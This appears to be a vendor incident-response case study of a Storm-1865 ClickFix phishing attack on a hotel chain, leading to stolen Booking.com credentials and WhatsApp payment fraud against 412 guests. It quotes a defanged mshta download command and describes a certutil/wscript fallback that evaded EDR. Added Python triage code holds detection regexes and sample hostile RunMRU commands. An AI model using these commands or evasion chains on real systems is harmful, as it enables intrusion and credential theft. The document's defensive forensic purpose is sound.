The Situation
The first complaint arrived at 09:15 on a Tuesday morning. A guest called reception to ask why the hotel was requesting payment via WhatsApp when they had already paid in full. By 10:00, reception had received seven similar calls across three properties.
The WhatsApp messages were convincing. They contained the guest's full name, booking reference, check-in date, room type, and the exact amount paid. The message claimed there was a "payment verification issue" and provided a link to "confirm" card details. The phone numbers sending the messages were unknown, but the booking data was accurate.
The hotel chain contacted their managed service provider. The MSP had deployed SentinelOne across all endpoints six months earlier. A check of the console showed no alerts, no detections, no suspicious activity. Yet somehow, guest data was in the hands of fraudsters.
The MSP's initial theory was that Booking.com itself had been breached. But Booking.com confirmed their systems were secure. The compromise had to be on the hotel's side.
The Challenge
The MSP faced a multi-layered problem. Guest data was actively being exploited for fraud. The source of the compromise was unknown. The EDR showed nothing. And every hour that passed meant more guests receiving fraudulent WhatsApp messages.
Traditional forensic imaging of 92 front-of-house computers across five properties would take months. Each device would need to be taken offline, imaged, and analysed individually. For a hotel chain operating 24/7, this approach was not viable.
The reputational damage was mounting. Guests were posting on social media. Review sites were filling with complaints. The hotel needed to understand what had happened, notify affected guests, and demonstrate to regulators that they had responded appropriately.
The Investigation
Strand's collection agent was deployed remotely to all 92 front-of-house devices across the chain's five properties within two hours. The investigation revealed a sophisticated attack chain that Microsoft tracks as Storm-1865, a threat actor specifically targeting the hospitality sector.
The Phishing Email: Fake Booking.com Notification
The attack began three days earlier with a phishing email to the reservations team. The email appeared to come from Booking.com with the subject line "You have a new last-minute booking - Action Required." The formatting, branding, and sender address closely mimicked legitimate Booking.com partner notifications.
Email header analysis recovered from Outlook cached data showed the message originated from a lookalike domain: booking-partner-notifications[.]com. The email contained a single call-to-action button: "View Booking Details." URL analysis revealed it pointed to a typosquatted domain hosting a fake Booking.com extranet login page.
The ClickFix CAPTCHA: Social Engineering the User
When the reservations staff member clicked through to view the supposed booking, they encountered what appeared to be a Booking.com verification page. The page displayed a CAPTCHA with instructions to "verify you are human" by pressing a specific key combination: Windows + R, then Ctrl + V, then Enter.
The fake CAPTCHA page used JavaScript to silently copy a malicious mshta.exe command to the clipboard when the user clicked the checkbox. The Win+R shortcut opened the Windows Run dialog, Ctrl+V pasted the command, and Enter executed it. From the system's perspective, the user voluntarily ran the command, making it appear as legitimate activity under explorer.exe.
Dual Payload: Infostealer and RAT
The mshta.exe command downloaded and executed two payloads: Lumma Stealer for credential harvesting and XWorm RAT for persistent remote access. This combination is characteristic of Storm-1865 campaigns observed throughout 2025.
The mshta command (recovered from RunMRU at HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU) executed: mshta hxxps://booking-extranet-verify[.]com/captcha.hta. The HTA file contained obfuscated VBScript that downloaded lumma.exe and xworm.exe to C:\Users\Public\Downloads\, executing both with scheduled task persistence.
Why SentinelOne Missed It
The EDR detected and blocked the initial suspicious activity but failed to catch the fallback mechanism. SentinelOne flagged the mshta.exe network connection as suspicious and terminated the process. However, the ClickFix page anticipated this and displayed "Verification failed - please try again" with a modified command.
The second attempt used a different execution chain: the command wrote a Base64-encoded PowerShell script to a .txt file in %TEMP%, then used certutil.exe to decode it, and finally executed it via wscript.exe. This LOLBIN chain evaded the behavioural signatures that caught the first attempt.
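A triage routine for the RunMRU evidence and the certutil/wscript fallback chain described above, added here as an example and not part of the original write-up or Strand's tooling: it orders a RunMRU export by its MRUList value and flags commands that match the LOLBIN patterns seen in this case. The RunMRU values are constructed to mirror the commands quoted in this section.

```python
import re
from dataclasses import dataclass

# Constructed RunMRU export (hypothetical, modelled on the case): value names are
# single letters, "MRUList" orders them most-recent-first, and each command carries
# a trailing "\1" as written by the Run dialog.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "mshta hxxps://booking-extranet-verify[.]com/captcha.hta\\1",
    "c": "cmd /c certutil -decode %TEMP%\\v.txt %TEMP%\\v.vbs && wscript %TEMP%\\v.vbs\\1",
}

# Patterns for the living-off-the-land chains discussed on this page.
LOLBIN_RULES = [
    (r"\bmshta(\.exe)?\b.*(hxxps?|https?)://", "mshta fetching remote HTA"),
    (r"\bcertutil(\.exe)?\b.*-(decode|urlcache)", "certutil used to decode/download"),
    (r"\b[wc]script(\.exe)?\b.*%temp%", "script host launched from %TEMP%"),
    (r"\bpowershell(\.exe)?\b.*-(e|enc|encodedcommand)\b", "encoded PowerShell"),
]

@dataclass
class Finding:
    order: int      # 0 = most recently run
    command: str
    reasons: list

def parse_runmru(values):
    """Return commands in most-recent-first order with the trailing '\\1' stripped."""
    commands = []
    for name in values.get("MRUList", ""):
        raw = values.get(name)
        if raw is None:
            continue
        commands.append(raw[:-2] if raw.endswith("\\1") else raw)
    return commands

def triage_runmru(values):
    """Flag every RunMRU command that matches at least one LOLBIN rule."""
    findings = []
    for idx, cmd in enumerate(parse_runmru(values)):
        reasons = [why for pat, why in LOLBIN_RULES if re.search(pat, cmd, re.I)]
        if reasons:
            findings.append(Finding(idx, cmd, reasons))
    return findings
```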
Credential Theft and Extranet Access
Lumma Stealer harvested saved credentials from Chrome within 30 seconds of execution. The Booking.com extranet credentials were exfiltrated to the attacker's C2 server. Four hours later, the threat actor logged into the legitimate Booking.com extranet using the stolen credentials.
Chrome Login Data SQLite database analysis confirmed access to stored credentials. Browser history from the threat actor's session (captured via XWorm's keylogging and screenshot functionality) showed them navigating to Booking.com extranet, accessing the reservations dashboard, and exporting guest data including names, phone numbers, email addresses, and booking details.
Guest Data Extraction and WhatsApp Campaign
The threat actor exported reservation data for 412 guests with upcoming bookings. Within 24 hours, these guests began receiving WhatsApp messages from unknown numbers containing their exact booking details and a fraudulent payment link.
XWorm RAT logs recovered from the C2 callback data showed clipboard activity consistent with copying guest phone numbers. The WhatsApp messages were sent from disposable SIM numbers, making them untraceable. The payment links directed to a fake Booking.com payment page designed to harvest card details.
Persistence Mechanisms Identified
Strand identified multiple persistence mechanisms that remained active on the compromised workstation. The XWorm RAT had established scheduled tasks, registry run keys, and a startup folder shortcut to ensure it survived reboots.
Persistence artifacts:
- Scheduled task "ChromeUpdateService" executing C:\Users\Public\Downloads\svchost.exe (actually XWorm)
- Registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDefender pointing to the same binary
- Startup folder shortcut disguised as "Microsoft Edge.lnk" with a modified target path
All three mechanisms were missed by the EDR.
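A persistence triage check built around the three mechanisms above, added here as an example rather than the page's or Strand's own code: it scores each scheduled task, Run key value and startup shortcut on whether the target is a system binary name living outside the Windows directory, sits in a user-writable location, or carries a trusted product's name while pointing somewhere untrusted. The entries, the benign ones included, are constructed.

```python
import ntpath
from dataclasses import dataclass

# Binary names that should only ever run from the Windows directory.
SYSTEM_BINARY_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "explorer.exe"}
WINDOWS_DIR = ("c:\\windows\\",)
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
USER_WRITABLE = ("c:\\users\\public\\", "\\appdata\\local\\temp\\", "\\downloads\\")
# Product names frequently borrowed by persistence entries to look legitimate.
IMPERSONATED = ("windowsdefender", "chromeupdate", "microsoft edge", "googleupdate")

@dataclass
class Persistence:
    kind: str     # "task", "runkey" or "startup"
    name: str     # task name, Run value name or shortcut file name
    target: str   # executable the entry launches (shortcut target already resolved)

# Constructed entries: the three mechanisms from the case plus two benign ones.
SAMPLE_ENTRIES = [
    Persistence("task", "ChromeUpdateService", r"C:\Users\Public\Downloads\svchost.exe"),
    Persistence("runkey", "WindowsDefender", r"C:\Users\Public\Downloads\svchost.exe"),
    Persistence("startup", "Microsoft Edge.lnk", r"C:\Users\Public\Downloads\svchost.exe"),
    Persistence("task", "VendorBackup", r"C:\Program Files\Vendor\backup.exe"),
    Persistence("runkey", "OneDrive", r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe"),
]

def assess(entry):
    """Return the reasons an entry looks suspicious; an empty list means nothing found."""
    path = entry.target.lower()
    base = ntpath.basename(path)
    reasons = []
    if base in SYSTEM_BINARY_NAMES and not path.startswith(WINDOWS_DIR):
        reasons.append(f"{base} outside Windows directory")
    if any(seg in path for seg in USER_WRITABLE):
        reasons.append("target in user-writable location")
    if any(n in entry.name.lower() for n in IMPERSONATED) and not path.startswith(TRUSTED_DIRS):
        reasons.append("name impersonates a trusted product but target is untrusted")
    return reasons

def triage_persistence(entries):
    """Map 'kind:name' to its reasons for every entry that raised at least one."""
    result = {}
    for entry in entries:
        reasons = assess(entry)
        if reasons:
            result[f"{entry.kind}:{entry.name}"] = reasons
    return result
```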
Attack Timeline
Phishing email received
- Subject: "You have a new last-minute booking - Action Required"
- Sent to reservations team email
- From: noreply@booking-partner-notifications[.]com
Staff member clicks through to fake extranet
- Fake Booking.com login page displayed
- ClickFix CAPTCHA presented
First ClickFix attempt blocked
- SentinelOne flags mshta.exe network activity
- Process terminated
- EDR alert: Suspicious script execution
Second attempt succeeds
- "Verification failed, try again" displayed
- certutil/wscript chain bypasses EDR
- LOLBIN execution chain
Dual payload deployed
- Lumma Stealer harvests credentials
- XWorm RAT establishes persistence
- C:\Users\Public\Downloads\svchost.exe
Threat actor accesses Booking.com extranet
- Login from Eastern European IP
- Guest reservation data exported
- 412 guest records accessed
WhatsApp fraud campaign
- Guests receive messages with real booking details
- Fraudulent payment links distributed
First guest complaint received
- Investigation initiated
- Strand deployed to 92 devices
Detection Analysis
What SentinelOne Detected
- Initial mshta.exe network connection flagged and blocked
- Process terminated before payload delivery
What SentinelOne Missed
- Second attempt via certutil/wscript LOLBIN chain
- Lumma Stealer credential harvesting
- XWorm RAT installation and C2 communication
- Three separate persistence mechanisms
What Strand Identified
- Phishing email with lookalike domain in cached Outlook data
- RunMRU entries showing both mshta and certutil execution
- Lumma Stealer artifacts and Chrome credential access timestamps
- XWorm RAT binary disguised as svchost.exe
- Three persistence mechanisms (scheduled task, run key, startup folder)
- 412 guests with exported data identified for notification
Key Takeaways
1. Storm-1865 specifically targets hospitality sector staff with convincing Booking.com phishing emails. Staff should verify unexpected "new booking" or "action required" emails by logging into the extranet directly rather than clicking email links.
2. ClickFix attacks anticipate EDR detection and include fallback execution methods. Blocking the first attempt is not sufficient if users retry when prompted.
3. The combination of infostealer plus RAT enables both immediate credential theft and persistent access for ongoing exploitation.
4. LOLBIN chains using certutil, wscript, and mshta can bypass behavioural detection that catches direct PowerShell execution.
5. Booking.com extranet credentials provide access to guest PII including phone numbers. This data enables highly convincing fraud campaigns via WhatsApp that bypass email security entirely.
6. Compromised Booking.com partner accounts are sold on Russian-speaking forums for $30 to $5,000 depending on reservation volume. Hotels are high-value targets in this underground economy.